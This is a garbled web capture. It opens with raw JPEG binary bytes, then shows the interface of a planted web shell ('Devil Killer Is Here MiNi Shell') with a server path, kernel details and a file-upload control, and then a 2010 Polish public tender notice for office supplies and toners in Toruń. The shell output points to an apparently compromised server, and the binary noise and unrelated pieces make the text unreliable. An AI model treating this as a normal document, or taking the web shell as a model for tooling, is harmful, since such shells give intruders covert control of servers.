JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100916/294930-N-2010.html

<p class="kh_header"><b>Toruń: Sukcesywna dostawa materiałów biurowych, piśmiennych  oraz tonerów do kserokopiarek i drukarek</b><br>
<b>Numer ogłoszenia: 294930 - 2010; data zamieszczenia: 16.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli , Aleja Solidarności 3, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 62 277 47, faks 56 62 231 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpcen-torun.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów biurowych, piśmiennych  oraz tonerów do kserokopiarek i drukarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów biurowych, piśmiennych  oraz fabrycznie nowych materiałów eksploatacyjnych do kserokopiarek i drukarek zgodnie z poniższym wykazem. Zakres oraz minimalne warunki techniczne przedmiotu zamówienia określono w wykazie. Zamawiający dopuszcza składanie ofert częściowych z podziałem na dwa pakiety.
Wykonawca może złożyć ofertę na jedno, bądź obie części.
Badanie i ocena ofert, wybór najkorzystniejszej oferty, oraz zawarcie umowy zostanie przeprowadzone odrębnie dla każdej z części
Część I  Dostawa materiałów biurowych i piśmiennych. W skład przedmiotu zamówienia tej części wchodz:
 1.Bloczek samoprzylepny, 100 ark., 4,0 x 5,0cm wysokiej jakości karteczki samoprzylepne, nie pozostawiające śladów po odklejeniu, Szt. 1,2.Bloczek samoprzylepny, 100 ark., 7,5 x 7,5cm wysokiej jakości karteczki samoprzylepne, nie pozostawiające śladów po odklejeniu, Szt. 1,3.Blok do flipczartów   50 kartek, uniwersalny, gładki blok papierowy, standardowy rozmiar, Szt. 1, 4.Blok makulaturowy A-4 w kratkę 100 kartkowy, klejony po krótszym boku,Szt. 1, 5.Blok makulaturowy A-5 w kratkę 100 kartkowy, klejony po krótszym boku,Szt. 1, 6.Blok makulaturowy A-6 w kratkę 100 kartkowy, klejony po krótszym boku,Szt. 1, 7.Cienkopis  tusz odporny na wysychanie z plastikową końcówką oprawioną metalem ,wentylowana skuwka,  grubość linii pisania 0,4 mm, kolor czarny,Szt. 1, 8.Cienkopis tusz odporny na wysychanie z plastikową końcówką oprawioną metalem ,wentylowana skuwka,  grubość linii pisania 0,4 mm, kolor niebieski,Szt. 1, 9.Cienkopis tusz odporny na wysychanie z plastikową końcówką oprawioną metalem ,wentylowana skuwka,  grubość linii pisania 0,4 mm, kolor zielony ,Szt. 1, 10Cienkopis tusz odporny na wysychanie z plastikową końcówką oprawioną metalem ,wentylowana skuwka,  grubość linii pisania 0,4 mm, kolor czerwony,Szt. 1, 11.Długopis w  przezroczystej obudowie, wygodna skuwka  z klipem, długość linii pisania 1700 m, wymienny wkład czarny, Szt. 1, 12.Wkład pasujący do ww. długopisu,Szt. 1,
13. Długopis w  przezroczystej obudowie, wygodna skuwka  z klipem, długość linii pisania 1700 m, wymienny wkład niebieski,Szt. 1, 14.Wkład pasujący do ww. długopisu,Szt. 1, 15.Dziennik korespondencyjny A4 wykonany z twardego kartonu pokrytego folią PP,Szt. 1, 16.Dziurkacz biurowy z prowadnicą, na minimum 20 kartek Szt. 1, 17. Etykiety samoprzylepne  105x42,3mm 70x41mm  (14 etykiet na arkuszu x 100 arkuszy - 1 op.) przeznaczone do wszystkich typów drukarek atramentowych, laserowych oraz kserokopiarek, pakowane po 100 arkuszy, posiadają technologię QCT zapobiegającą wydostawaniu się kleju podczas drukowania, zawierają specjalny klej odporny na wysoką temperaturę, posiadają unikalny system QuickPEELTM ułatwiający odrywanie i szybsze przyklejanie etykiet, ekologiczne, które można zutylizować, szablony etykiet dostępne w programach komputerowych, nie gorszej jakości niż AVERY ZWECKFORM,Op. 1, 18. Etykiety samoprzylepne 70x41mm (21 etykiet na arkuszu x 100 arkuszy - 1 op.) przeznaczone do wszystkich typów drukarek atramentowych, laserowych oraz kserokopiarek, pakowane po 100 arkuszy, posiadają technologię QCT zapobiegającą wydostawaniu się kleju podczas drukowania, zawierają specjalny klej odporny na wysoką temperaturę, posiadają unikalny system QuickPEELTM ułatwiający odrywanie i szybsze przyklejanie etykiet, ekologiczne, które można zutylizować, szablony etykiet dostępne w programach komputerowych, nie gorszej jakości niż AVERY ZWECKFORM,Op. 1, 19. Flamastry tusz na bazie wody, nietoksyczne, odporne na działanie światła, kpl 4 podstawowe kolory - czarny, niebieski, czerwony, zielony, Kpl. 1, 20. Grzbiety do bindowania 10 mm ,op. 100 szt., Op. 1, 21. Grzbiety do bindowania 12,5 mm ,op.100 szt., Op. 1, 22. Grzbiety do bindowania 14 mm ,op. 100 szt., Op. 1, 23. Grzbiety do bindowania 16 mm ,op. 100 szt., Op. 1, 24. Grzbiety do bindowania 8 mm ,op. 100 szt., Op. 1, 25. Gumka do usuwania śladów ołówka, może byś stosowana do każdego rodzaju papieru, mała 350 mm x 115 mm x 155 mm, Szt.1, 26. Identyfikator z klipsem wykonany z przezroczystego, sztywnego tworzywa o grubości 0,35 mm, klips i agrafka, kartonik z wydrukowaną ramką, wymiary 57x90 mm, Szt.1, 27. Kalendarz trójdzielny, Szt.1, 28. Kalendarz stojący ze spiralką, format  13,5 x 20,0 cm, Szt.1, 29. Kalendarz książkowy, format  15,0 x 21,5 cm,  cały tydzień na 2 stronach, Szt.1, 30. Kalendarz nauczyciela,  format  15,0 x 21,5 cm,   cały tydzień na 2 stronach, Szt.1, 31. Kalkulator  - plastikowa obudowa i klawisze, duże plastikowe przyciski, korekta ostatniej cyfry, 12 pozycyjny duży wyświetlacz, podwójne zasilanie, podwójna pamięć, zaokrąglanie wyników, obliczanie marży, klawisz cofania, klawisz do przodu, klawisz zmiany znaku + oraz - klawisz podwójnego zera, Szt.1, 32. Klej w sztyfcie, nietoksyczny o zwiększonej trwałości klejenia, zmywalny wodą, nie powodujący fałdowania papieru/ 25 g , Szt.1, 33. Klipy do papieru 19 mm , 12 szt. op. metalowe, Op. 1, 34. Klipy do papieru 25 mm , 12 szt. op. metalowe, Op. 1,35. Klipy do papieru 32 mm ,12 szt. op. metalowe, Op. 1, 36. Koperta samoprzylepna biała C-4 op. 250 szt., Op. 1, 37. Koperta samoprzylepna biała C-5 op. 500 szt., Op. 1,38. Koperta samoprzylepna biała, C-6 op. 1000 szt., Op. 1, 39. Koperta samoprzylepna biała podłużna 220 x 110 mm bez okienka op.-1000 szt., Op. 1, 40. Korektor w płynie szybkoschnący, aplikator w formie gąbki zapewnia precyzyjne i łatwe korygowanie dużych powierzchni, 20 ml, Szt.1, 41.Korektor w kształcie pióra z cienką, zaworkową końcówką, szybkoschnący płyn korygujący, Szt.1, 42.Koszulka A-4 krystaliczna cienka, 100 szt. op., Op. 1, 43.Koszulka A-4 średniej grubości, bez połysku ,100 szt. op., Op. 1, 44.Koszulka A-4 średniej grubości, bez połysku z klapką, 1 szt., 45.Koszulka A-5 średniej grubości, bez połysku ,100 szt. op.,Op.1, 46.Linijka  wykonana z polipropylenu, trwałe nieścieralne podziałki, zaokrąglone rogi, 30 cm,Szt.1, 47.Listwy wsuwalne 10 mm,50 szt. op., Op. 1, 48.Listwy wsuwalne 6 mm,50 szt. op., Op. 1, 49.Markery do flipczartów duży zapas atramentu, duże gabaryty, wygodny w użyciu  ergonomiczny kształt  i gumowy uchwyt, ścięta końcówka, mix kolor, etui 4 sztuki (cztery kolory),Kpl. 1, 50.Markery do tablic sucho ścieralnych z gąbką, etui - 4 sztuki (cztery kolory), duży zapas atramentu, duże gabaryty, wygodny w użyciu  ergonomiczny kształt  i gumowy uchwyt, wbudowany w zatyczce wymazywacz  (gąbka) pozwalający na szybka korektę, nie pozostawiający żadnych śladów na tablicy po wytarciu, bardzo łatwo usuwalny, okrągła końcówka mix kolor, etui 4 sztuki, Kpl. 1, 51.Masa mocująca,Szt.1, 52.Niszczarka na dokumenty przeznaczona do średniego natężenia pracy, niszczy dokumenty ze zszywkami, małymi spinaczami oraz płytami CD, szerokość wejścia 230mm, auto start,stop- fotokomórka, funkcja cofania, kosz o pojemności 23 l,, zatrzymuje pracę noży w momencie dotknięcia szczeliny wejściowej przez ludzi lub zwierzęta, nie gorszej jakości niż Fellowes,Szt.1, 53.Nożyczki biurowe wykonane ze stali nierdzewnej, hartowanej, ostre i trwałe o gładkim ostrzu, gumowy uchwyt, 18 cm,Szt.1, 54.Ofertówki A4 krystaliczne, sztywne, wykonane z przezroczystej folii PCV, otwierane u góry i z prawej strony, 25 szt. op., Op. 1, 55.Okładka do bindowania A4, przezroczyste, wykonane z twardej, przezroczystej folii PCV 100 szt.- opakowanie, Op. 1, 56.Okładka do bindowania typu delta, o strukturze skóry, 250 gm A4 op. =100 szt., Op. 1, 57.Ołówek HB z gumką, odporny na złamania,  wykonany z żywicy syntetycznej, super trwały, niełamliwy grafit, w razie złamania nie pozostawiający drzazg, o długości 18 cm.,Szt.1, 58.Papier A3x160gxm, o powierzchni gładkiej zapewniającej żywe i intensywne barwy, do drukarek kolorowych laserowych, struktura arkusza umożliwia zadruk jedno-i dwustronny, kolor niebieski, ryza=250 arkuszy,1 ryza, 59.Papier A3x80gxm, białość CIE 166,  uniwersalny umożliwiający zadruk jedno- i dwustronny, do wydruków kolorowych, czarno-białych i kopiowania; zapewniający wyraźny kontrast tekstu i kolorów, ryza=500 arkuszy, 1 ryza, 60.Papier A4x160gxm, o powierzchni gładkiej zapewniającej żywe i intensywne barwy, do drukarek kolorowych laserowych, struktura arkusza umożliwia zadruk jedno-i dwustronny, ryza=250 arkuszy,1 ryza, 61.Papier A4x80gxm,  kolorowy, umożliwiający zadruk jedno- i dwustronny, do wydruków kolorowych, czarno-białych i kopiowania; zapewniający wyraźny kontrast tekstu i kolorów, ryza=500 arkuszy, 1 ryza, 62.Papier A4x80gxm, białość CIE 166,  uniwersalny umożliwiający zadruk jedno- i dwustronny, do wydruków kolorowych, czarno-białych i kopiowania; zapewniający wyraźny kontrast tekstu i kolorów,ryza=500 arkuszy, 1 ryza, 63.Papier do metkownicy intensywny kolor, Szt. 1, 64.Pianka do ekranów, obudów i klawiatur, 400 ml, Szt. 1, 65.Pinezki do tablic korkowych kolorowe op.-50 szt., Op. 1, 66.Pióro kulkowe płynny tusz żelowy, szybkoschnący, końcówka 0,7 mm, gumowy uchwyt oraz metalowy klip, system przyciskowy, wymienny wkład czarny,  Szt. 1, 67.Wkład pasujący do ww. pióra kulkowego, Szt. 1, 68.Pióro kulkowe płynny tusz żelowy, szybkoschnący, końcówka 0,7 mm, gumowy uchwyt oraz metalowy klip, system przyciskowy, wymienny wkład niebieski, Szt. 1, 69.Wkład pasujący do ww. pióra kulkowego, Szt. 1,
70.Pióro kulkowe wodoodporny, pigmentowy tusz, odporny na blaknięcie, kapilarny system podawania tuszu, kulka z węglika wolframu, długość linii pisania 1300 m, szerokość linii pisania - 0,2 mm, kolor czarny, Szt. 1,
71.Pióro kulkowe wodoodporny, pigmentowy tusz, odporny na blaknięcie, kapilarny system podawania tuszu, kulka z węglika wolframu, długość linii pisania 1300 m, szerokość linii pisania - 0,2 mm, kolor  niebieski, Szt. 1, 72.Płyta CDR w kopercie, Szt. 1, 73.Półka na dokumenty wykonana z polistyrenu o wysokiej wytrzymałości, przezroczysta, na dokumenty formatu A4, Szt. 1, 74.Przezroczyste, kolorowe zakładki indeksujące samoprzylepne, końcówka zakładki kolorowa, plastikowe, rozmiar 12x43 mm., Szt. 1, 75.Pudło archiwizacyjne zbiorcze pole opisowe na grzbiecie i bocznej ściance, wymiary: 350 x 200 x250 mm., Szt. 1, 76.Segregator  A4/75 wykonany z utwardzonego kartonu pozyskanego w drodze recyclingu, na grzbiecie znajduje się  wzmocniony otwór na palec, dźwignia wysokiej jakości z dociskaczem, Szt. 1, 77.Segregator A4x35 oklejony kolorową folią PCV, 4 ringi, szerokość grzbietu 35 mm, wymienna dwustronna etykieta na grzbiecie, Szt. 1, 78.Segregatory PCV  A4x75 ze wzmocnioną dolną krawędzią, wymienną etykietą na grzbiecie, mechanizmem z dźwignią, Szt. 1, 79.Segregatory PCV A4x50 ze wzmocnioną dolną krawędzią, wymienną etykietą na grzbiecie, mechanizmem z dźwignią, Szt.1, 80.Segregatory PCV A5x35,z wymienną etykietą na grzbiecie, mechanizmem z 2 kółkami, Szt.1, 81.Skoroszyt A-4 sztywny PCV, okładki przezroczyste, bez zawieszki, Szt.1, 82.Skoroszyt A-4, plastikowy, przednia okładka przezroczysta, bez zawieszki, Szt.1, 83.Skoroszyt A-4, plastikowy, przednia okładka przezroczysta,  z zawieszką,Szt.1, 84.Skoroszyt kartonowy A-4 bez zawieszki,   wykonany z białego kartonu,Szt.1, 85.Skoroszyt kartonowy A-4 z zawieszką, 1-1, wykonany z białego kartonu,Szt.1, 86Skoroszyt kartonowy A-4 z zawieszką, 1-2,   wykonany z białego kartonu, Szt.1, 87.Spinacze biurowe okrągłe duże 10 szt.,op., op.1, 88.Spinacze biurowe okrągłe małe 10 szt.,op., op.1, 89.Sprężone powietrze  przeznaczone do czyszczenia z kurzu miejsc trudnodostępnych w klawiaturach komputerowych, z wydłużoną dyszą umożliwiającą precyzyjne skierowanie strumienia powietrza o zwiększonym ciśnieniu, pozwalające na usunięcie trudnodostępnych zanieczyszczeń, o pojemności 430 ml, Szt. 1, 90.Szpilki standardowe, 26 mm dł.,op.50g,  op. 1, 91.Szuflada sekretarska przezroczysta na dokumenty,  Szt.1, 92.Ściereczka antystatyczna  z mikrofibry, przeznaczona do czyszczenia ekranów notebooków, aparatów telefonicznych,  fotograficznych, monitorów LCD, płyt CD i DVD, rozmiar 15x20 cm., Szt. 1, 93.Ściereczki nasączane do ekranów LCD, antystatyczne, nie pozostawiające smug, przyjazne dla środowiska, pozostawiające świeży zapach, zapewniające ochronę antybakteryjną, bez alkoholu, pakowane po 85 szt., Szt. 1, 94.Taśma klejąca przezroczysta, bezbarwna 18 mm x 20m,  Szt.1, 95.Taśma maskująca idealna do oklejania kantów, kątów i naroży 30 mm x 40 m, Szt. 1, 96.Taśma opakowaniowa o bardzo dobrych właściwościach klejących, 48 mm,  Szt. 1, 97.Teczka kartonowa lakierowana,twarda okładka z gumką A-4, Szt. 1, 98.Teczka kartonowa zwykła, biała z gumką,  Szt. 1, 99.Teczka kartonowa zwykła, biała, wiązana,  Szt. 1, 100.Temperówka pojedyncza,  Szt. 1, 101.Tusz wodny do stempli czerwony 25  ml,  Szt. 1,
102.Zakładki indeksujące samoprzylepne, 4 kolory 20 x 50 mm, Szt. 1, 103.Zakreślacz fluorescencyjny, tusz na bazie wody, szerokość linii pisania od 2 do 5 mm, ze ściętą końcówką do pisania po wszystkich rodzajach papieru, papieru samokopiującego i faksowego, zestaw  4 sztuki w kolorach: żółtym, zielonym, pomarańczowym, różowym, kpl. 1, 104.Zeszyty A-4, zszywany, twarda okładka, 96 k.,  Szt. 1, 105.Zeszyty A-5, miękka okładka, 16 k.,  Szt. 1, 106.Zeszyty A-5, miękka okładka,32 k.,  Szt. 1, 107.Zeszyty A-5, miękka okładka, 60 k.,  Szt. 1, 108.Zeszyty A-5, zszywany, twarda okładka, 96 k.,  Szt. 1, 109.Zszywacz biurowy na zszywki 246, zszywający do 30 kartek,   Szt. 1, 110.Zszywki zwykłe 24/6,  Szt. 1, 111.Żel do ekranów LCD, filtrów i ekranów powlekanych, 200 ml,  Szt. 1, 112.Druk -Wniosek o zaliczkę-A-6  bloczek 40 kartek, niekopiujący, Szt. 1, 113.Druk  -Rozliczenie zaliczki-A6 bloczek 40 kartek, niekopiujący, Szt. 1, 114.Druk -Polecenie wyjazdu służbowego- A5 bloczek 40 kartek, Szt. 1, 115.Druk -Arkusz spisu z natury-A4 samokopiujący, bloczek 50 kartek, Szt. 1,
Część  2  Dostawa tonerów do kserokopiarek i drukarek. W skład przedmiotu zamówienia tej części wchodzi:
1.Toner do drukarki HP Laser Jet 1005 (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 2.Toner do drukarki HP Laser Jet P 1006 (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 3.Toner do drukarki HP Laser Jet 1018 (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 4.Toner do drukarki HP Laser Jet 1100 (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 5.Toner do drukarki HP Laser Jet 1320 (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 6.Toner do drukarki HP Laser Jet  CP 1215 bleck (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 7.Toner do drukarki HP Laser Jet  CP 1215 magneta (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 8.Toner do drukarki HP Laser Jet  CP 1215 cyan (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 9.Toner do drukarki HP Laser Jet CP 1215 yellows (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 10.Toner do drukarki Laser ML-201OP Samsung (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 11.Toner do drukarki laserowej OKI 430 d  (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 12.Toner do drukarki Samsung CLP-300 kolor komplet tonerów, (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 13.Toner do drukarki wielofunkcyjnej HP F 735 bleck (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 14.Toner do drukarki wielofunkcyjnej HP F 735 kolor (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 15.Toner do kserokopiarki Ricoch Aficio 200 (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 16.Toner do kserokopiarki Ricoch Aficio 2020 b (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 17.Toner do kserokopiarki Ricoch Aficio MP 161 (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1, 18.Toner do kserokopiarki  Canon  NP 1010  (oryginał) fabrycznie nowy, zalecany przez producenta tych drukarek i oznakowany logiem producenta *, Szt. 1.

* lub produkt równoważny, przy czym przez produkt równoważny rozumie produkt kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądź lepszych (pojemność tonera, wydajność i jakość wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia.
Wykonawca gwarantuje, że dostarczone tonery będą wysokiej jakości oraz zapewniają kompatybilność pracy z urządzeniami zamawiającego, zapewniają należyte bezpieczeństwo oraz posiadają właściwe opakowanie i oznakowanie.
Wykonawca gwarantuje, że zamontowanie i używanie dostarczonych przez niego wkładów drukujących nie spowoduje utraty praw gwarancji producenta urządzenia, do którego są przeznaczone. 
Artykuły biurowe, piśmienne  oraz tonery do kserokopiarek i drukarek muszą spełniać wymagania norm PN i być dopuszczone do obrotu na rynku europejskim, a także powinny być w estetycznych opakowaniach, zamkniętych fabrycznie, bez fizycznych uszkodzeń dyskwalifikujących produktu - np. ubytki, uszkodzone opakowanie, zniszczone towary wewnątrz opakowania.
Podane przez Zamawiającego ewentualne nazwy (znaki towarowe) zamawianego asortymentu mają charakter przykładowy, a ich wskazanie ma charakter określenia oczekiwanego standardu zamawianego asortymentu.
Wykonawca zobowiązuje się do dostarczenia wyżej wymienionych produktów do siedziby Zamawiającego własnym transportem i na własny koszt.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
Zamawiający nie przewiduje możliwości składania ofert wariantowych.
Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
Zamawiający dopuszcza składanie ofert równoważnych w zakresie wskazanym przez Zamawiającego.
Zamawiający dopuszcza powierzenie części lub całości zamówienia podwykonawcom. Wykonawca ma obowiązek wykazania w ofercie, którą część zamówienia będzie powierzona podwykonawcom.
1.Ilości artykułów biurowych, piśmiennych oraz tonerów do kserokopiarek i drukarek w każdym asortymencie będą uzgadniane przy kolejnym zamówieniu i z zawiązku z tym, nie mogą stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń, co do ilości faktycznie zamawianych przez Zamawiającego w toku realizacji umowy w sprawie niniejszego zamówienia publicznego. 
2.Zamawiający zastrzega sobie prawo ograniczenia przedmiotu umowy w zakresie ilościowym i asortymentowym w przypadku, gdy z powodów ekonomicznych bieżących potrzeb lub innych okoliczności nie będzie to leżało w interesie Zamawiającego. W związku z ograniczeniem przez Zamawiającego przedmiotu umowy, Wykonawcy nie będą przysługiwały żadne roszczenia w stosunku do Zamawiającego. 
3.Dostawy stanowiące przedmiot zamówienia będą dostarczane do siedziby Zamawiającego sukcesywnie w okresie obowiązywania umowy w postaci dostaw częściowych na wezwanie Zamawiającego w terminie 5 dni od wezwania. 
4.Wezwanie zostanie przekazane Wykonawcy w formie telefonicznej, faxem, pocztą elektroniczną lub pisemnie. W wezwaniu zostanie określony zakres dostawy ilościowej i asortymentowej oraz data jej realizacji. 
5.Wykonawca zobowiązuje się do realizacji w terminie 5 dni od daty doręczenia zgłoszenia przez Zamawiającego, ewentualnych reklamacji ilościowych, asortymentowych i jakościowych. 
6.W czasie obowiązywania zawartej umowy w wyniku niniejszego przetargu rozliczenie następować będzie w oparciu o faktycznie dostarczoną dostawę ilościową i asortymentową oraz ceny jednostkowe określone w ofercie Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.00.00-7, 30.19.14.00-8, 30.23.72.50-6, 30.19.76.44-2, 32.35.31.00-3, 30.12.51.10-5, 30.12.51.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

